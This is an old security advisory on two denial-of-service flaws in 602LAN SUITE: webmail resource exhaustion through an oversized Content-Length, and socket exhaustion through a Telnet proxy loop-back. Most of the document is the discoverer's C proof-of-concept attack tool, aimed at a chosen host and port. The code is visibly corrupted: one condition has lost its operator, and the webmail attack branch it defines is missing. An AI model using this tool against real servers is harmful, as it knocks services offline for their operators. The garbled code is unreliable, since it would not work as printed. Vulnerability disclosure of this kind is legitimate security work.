Reported November 7, 2004, by
Luigi Auriemma
VERSIONS AFFECTED
- 602LAN SUITE version
2004.0.04.0909
|
DESCRIPTION
Multiple Denial of Service (DoS) vulnerabilities have been discovered in Software602's
602LAN SUITE version 2004.0.04.0909 and prior. These two vulnerabilities
include:
- Resource consumption through Web
mail
An attacker can use the Web mail service (/mail) to consume the remote
server's CPU and memory. The attacker uses the POST request with a
Content-Length value that specifies the desired amount of
memory to
consume and specifies the subsequent closing of the
connection without the need to send the specified data. The duration of
the effect of each malformed request depends on the amount of data
specified.
- Sockets consumption through a
Telnet proxy loop
The Telnet proxy is vulnerable to a loop-back attack. It correctly prevents
user requests from connecting to the IP address 127.0.0.1, but it
doesn't apply the same filter to the server's other network interfaces, so
an attacker can force the server to connect to its own local IP addresses,
thus consuming all its sockets.
DEMONSTRATION
The discoverer posted the following code to demonstrate proof of concept:
/*
by Luigi Auriemma
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#ifdef WIN32
#include <winsock.h>
#include "winerr.h"
#define close closesocket
#else
#include <unistd.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <netdb.h>
#endif
#define VER "0.1"
#define BUFFSZ 2048
#define EATRAM 52428800
#define MEM "POST /mail HTTP/1.1\r\n" \
"Host:
localhost\r\n" \
"Content-Type:
application/x-www-form-urlencoded\r\n" \
"Content-Length:
%d\r\n" \
"\r\n"
\
"none"
int timeout(int sock, int secs);
u_long resolv(char *host);
void std_err(void);
int main(int argc, char *argv\[]) {
int sd,
len,
pcklen,
attack;
u_short port;
u_char buff\[BUFFSZ],
pck\[BUFFSZ];
struct sockaddr_in peer;
setbuf(stdout, NULL);
fputs("\n"
"602 Lan Suite <=
2004.0.04.0909 resources consumption "VER"\n"
"by Luigi Auriemma\n"
"e-mail:
aluigi@altervista.org\n"
"web:
http://aluigi.altervista.org\n"
"\n", stdout);
if(argc < 4) {
printf("\n"
"Usage:
%s <attack> <server> <port>\n"
"\n"
"Attack:\n"
"1
= CPU 100%% and memory eating through webmail service (m602cl3w): will
be\n"
"
made infinite connections eating %d megabytes of RAM each time, default\n"
"
port of this service is 80\n"
"2
= sockets consumption through telnet proxy loop, default port is 23\n"
"\n",
argv\[0], EATRAM >> 20);
exit(1);
}
#ifdef WIN32
WSADATA wsadata;
WSAStartup(MAKEWORD(1,0), &wsadata);
#endif
port = atoi(argv\[3]);
peer.sin_addr.s_addr = resolv(argv\[2]);
peer.sin_port = htons(port);
peer.sin_family = AF_INET;
printf("- target %s:%hu\n",
inet_ntoa(peer.sin_addr), port);
attack = atoi(argv\[1]);
if(attack 2) {
pcklen = sprintf(pck,
"%s:%d\r\n", inet_ntoa(peer.sin_addr), port);
fputs(
"-
sockets consumption attack: when you will see no new output on the
screen\n"
"
means the server has finished all its available sockets\n",
stdout);
sd = socket(AF_INET,
SOCK_STREAM, IPPROTO_TCP);
if(sd < 0) std_err();
if(connect(sd, (struct sockaddr
*)&peer, sizeof(peer))
< 0) std_err();
for(;;) {
if(send(sd,
pck, pcklen, 0)
<
0) std_err();
if(timeout(sd,
3) < 0) {
fputs("\nServer
seems vulnerable!\n", stdout);
}
len =
recv(sd, buff, BUFFSZ, 0);
if(len
< 0) std_err();
if(!len)
break;
buff\[len]
= 0x00;
printf("%s\n",
buff);
}
close(sd);
fputs("\nServer doesn't
seem vulnerable\n\n", stdout);
} else {
fputs("\nError: you must
choose an attack, 1 or 2\n\n", stdout);
}
return(0);
}
int timeout(int sock, int secs) {
struct timeval tout;
fd_set fd_read;
int err;
tout.tv_sec = secs;
tout.tv_usec = 0;
FD_ZERO(&fd_read);
FD_SET(sock, &fd_read);
err = select(sock + 1, &fd_read, NULL, NULL,
&tout);
if(err < 0) std_err();
if(!err) return(-1);
return(0);
}
u_long resolv(char *host) {
struct hostent *hp;
u_long host_ip;
host_ip = inet_addr(host);
if(host_ip == INADDR_NONE) {
hp = gethostbyname(host);
if(!hp) {
printf("\nError:
Unable to resolve hostname (%s)\n", host);
exit(1);
} else host_ip = *(u_long
*)(hp->h_addr);
}
return(host_ip);
}
#ifndef WIN32
void std_err(void) {
perror("\nError");
exit(1);
}
#endif
VENDOR RESPONSE
Software602 advises users to upgrade to 602LAN SUITE version 2004.0.04.1104 or
later.
CREDIT
Discovered by Luigi Auriemma.